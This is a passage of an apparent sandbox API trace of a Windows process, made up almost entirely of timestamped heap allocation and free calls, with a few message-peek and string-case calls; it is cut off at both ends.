lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0133.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0133.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0133.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0133.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0133.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0133.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0133.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0133.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0133.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0133.660] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0133.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0133.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0133.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0133.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0133.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0133.660] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0133.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0133.660] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0133.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0133.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0133.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0133.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0133.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0133.660] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0133.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0133.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0133.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0133.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0133.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0133.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0133.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0133.661] CharLowerBuffW (in: lpsz="byte[81856]", cchLength=0xb | out: lpsz="byte[81856]") returned 0xb [0133.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0133.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0133.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0133.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0133.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0133.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0133.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0133.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0133.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0133.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0133.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0133.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0133.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0133.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0133.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0133.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0133.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0133.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0133.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0133.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977a28 | out: hHeap=0x970000) returned 1 [0133.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0133.663] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0133.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0133.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0133.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0133.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0133.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0133.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977938 | out: hHeap=0x970000) returned 1 [0133.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0133.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0133.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0133.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ed0250 | out: hHeap=0x970000) returned 1 [0133.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0133.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0133.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0133.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ee4218 | out: hHeap=0x970000) returned 1 [0133.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0133.668] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0133.668] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0133.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdc0 | out: hHeap=0x970000) returned 1 [0133.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0133.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50758 [0133.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0133.668] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0133.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0133.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0133.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0133.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0133.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0133.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0133.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0133.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0133.668] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0133.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0133.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0133.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0133.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0133.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0133.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0133.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0133.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0133.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0133.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0133.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0133.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0133.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0133.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0133.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0133.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0133.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0133.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0133.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0133.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0133.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0133.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0133.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0133.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0133.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0133.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0133.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0133.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0133.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0133.669] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0133.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0133.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0133.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0133.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0133.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0133.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0133.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0133.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0133.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0133.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0133.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0133.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0133.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0133.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0133.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69888 [0133.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0133.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0133.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0133.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0133.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0133.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0133.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0133.670] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0133.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0133.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0133.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0133.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0133.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0133.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0133.670] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13fbd) returned 0x2ed0250 [0133.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0133.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ed0250 | out: hHeap=0x970000) returned 1 [0133.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0133.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0133.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0133.753] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0133.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0133.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0133.753] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0133.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0133.754] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e56430 [0133.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0133.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0133.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0133.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0133.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0133.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0133.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0133.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0133.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0133.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0133.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0133.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0133.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0133.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0133.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0133.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0133.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0133.760] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0133.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0133.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0133.760] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0133.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0133.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0133.760] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0133.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0133.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0133.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0133.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0133.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0133.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0133.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0133.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0133.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0133.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0133.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0133.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0133.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0133.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0133.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0133.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0133.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0133.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0133.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0133.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0133.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0133.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0133.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0133.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0133.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0133.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0133.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0133.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0133.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0133.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0133.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0133.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0133.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0133.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0133.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0133.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0133.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0133.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0133.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0133.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0133.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0133.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0133.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0133.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0133.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0133.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0133.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0133.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0133.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0133.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0133.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0133.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0133.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0133.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0133.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0133.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0133.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0133.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0133.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0133.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0133.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0133.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: 